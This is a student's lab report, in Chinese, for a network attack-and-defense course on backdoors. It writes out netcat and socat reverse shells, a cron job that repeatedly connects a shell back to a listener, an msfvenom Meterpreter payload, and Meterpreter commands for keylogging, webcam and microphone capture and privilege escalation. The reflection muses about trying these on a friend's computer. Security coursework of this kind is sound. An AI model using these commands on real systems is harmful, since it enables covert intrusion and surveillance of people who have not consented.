20154319 《网络对抗技术》后门原理与实践
一、實驗說明
任務一:使用netcat獲取主機操作Shell,cron啟動 (0.5分)
任務二:使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分)
任務三:使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell(0.5分)
任務四:使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,并嘗試提權 (2分)
二、基礎問題回答
1.問:例舉你能想到的一個后門進入到你系統中的可能方式?
下載一些破解版的軟件時,軟件內部可能會有附帶程序含有惡意代碼;電子郵件內的鏈接藏有木馬程序;鏈接公共WiFi是注入木馬程序;u盤拷貝進電腦。
2.問:例舉你知道的后門如何啟動起來(win及linux)的方式?
?win:通過“Windows->控制面板->管理工具->任務計劃程序”,創建任務。
Linux:可以通過cron來啟動;通過對正常軟件的綁定注入shellcode。
3.問:Meterpreter有哪些給你映像深刻的功能?
截取擊鍵記錄和截圖屏幕,感覺用電腦一直被監視。
4.問:如何發現自己有系統有沒有被安裝后門?
?
使用殺毒軟件查看;定期檢查進程管理器。
三、實驗過程
任務一 ?使用netcat獲取主機操作Shell,cron啟動
一、Win獲得Linux Shell
1.在Windows下使用指令,查看win主機IP為:192.168.199.187
ipconfig?
?
?
?
2.windows調用ncat.exe程序打開監聽,監聽端口為4319
3.在Linux中使用nc指令的-e參數反彈連接win
nc #win主機ip# #端口# -e /bin/sh4. windows下獲得一個linux shell,可運行任何linux指令,如輸入ls:
二、 Linux獲得Win Shell
1. 在Linux下使用指令查看linux主機IP為:192.168.199.132
ifconfig2.Linux下使用nc指令運行監聽:
nc -l -p 端口號3. 在windows中使用ncat.exe指令以及-e參數反彈連接Linux:
?
4. Linux下可看到Windows的命令提示,輸入windows的 ipconfig命令成功查看到windows主機的IP:
##nc傳輸數據(以后可以用來聊天~我在8888端口等你(?_?))
1. windows打開端口4319
2.讓Linux連接到4319端口
3.建立連接后傳輸數據,可實現互傳
三、cron啟動
1.Windows->控制面板->管理工具->任務計劃程序,創建任務:
2.Linux上cron啟動,在windows系統下監聽4319端口:
鍵入指令
crotab –e //-e 表示編輯,按a進入編輯界面在最后一行添加
51 * * * * /bin/netcat 192.168.199.187 4319 –e /bin/sh //表示每小時的第21分鐘反彈連接win第51分鐘后可以輸入指令,例如ls
?
任務二? 使用socat獲取主機操作Shell, 任務計劃啟動
socat下載地址[https://gitee.com/wildlinux/NetSec/attach_files]
因為之前沒有下載,這部分是分開做的。
1.win主機ip:172.30.3.26
2.Linux主機ip:172.30.4.219
3.?在windows系統下,輸入命令:
socat.exe tcp-listen:4319 exec:cmd,pty,stderr這里要注意路徑(可以直接將socat.exe拖到小黑框中)。
4.在Linux系統下,輸入命令:
socat - tcp: win主機ip可以成功獲得一個cmd shell,可以輸入指令,例如ipconfig
任務三 ?使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機并運行獲取主機Shell。
1.在Linux上輸入指令,生成一個名稱為4319.exe 后門可執行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORT=4319 -f exe >4319.exe?
2.利用ncat傳送文件到windows上,設置windows接收端口為4319,通過以下指令實現文件傳輸
nc -l 1234 > filename.out nc host.example.com 1234 < filename.in沒有截圖,沒有截圖,忘記了
3.在Linux下,MSF打開監聽進程:(可愛的羊??)
msfconsole4.查看并設置payload,LHOST和LPORT
第一行:進入handle模式;
第二行:設置payload;
第三行:查看當前信息狀態。
第一行:設置LHOST為192.168.199.132;
第二行:設置LPORT為4319。
4.輸入exploit命令,開始監聽:
exploit5.windows運行該后門文件:
6.成功獲取shell權限:
任務四? 使用MSF meterpreter獲取截圖、擊鍵記錄、獲取管理員權限偷看登錄密碼
1.獲取截圖
使用screenshot命令抓圖
?
2.獲取擊鍵記錄
keyscan_start //開始獲取 keyscan_dump //查看3.使用攝像頭進行拍照:
webcam_snap?
4.截獲一段音頻
record_mic5.獲得管理員權限,使用ps命令獲取登錄密碼
meterpreter > getsystem //獲得管理員權限 meterpreter > ps //獲取登錄密碼?
四、實驗中遇到的問題
1.已經解決的問題:第一次使用攝像頭拍照的時候拍不了,原因是超時了,重新在win系統運行一下就行
2.還在糾結的問題:不知什么叫積極拒絕???
五、實驗體會
這次實驗感觸很深,讓我以后用電腦都有一種被監視的感覺。這次使用Meterpreter還是很有趣的,功能很多,其中擊鍵記錄、偷窺登錄密碼、控制攝像頭等功能,覺得以后可以在朋友的電腦上試試,看起來很高級的樣子,不過實際操作做起來還算是比較簡單的。由于我的電腦本身就是Windows系統,就沒有裝Windows的虛擬機,直接在自己的電腦上做的時候,從Linux傳4319.exe后門程序到電腦上好幾次都直接消失了,被騰訊的電腦管家直接清理掉了,其實可以把后門程序設置在白名單里面就不用關閉殺毒軟件了,說明這個后門軟件還是很容易被殺毒軟件發現并直接清理掉的,用在實驗上還行,實際上可以成功的幾率還是很低吧。
?
轉載于:https://www.cnblogs.com/zwl154319/p/8667155.html
總結
以上是生活随笔為你收集整理的20154319 《网络对抗技术》后门原理与实践的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 集成显卡与独立显卡的区别
- 下一篇: ASP.NET MVC5(一):ASP.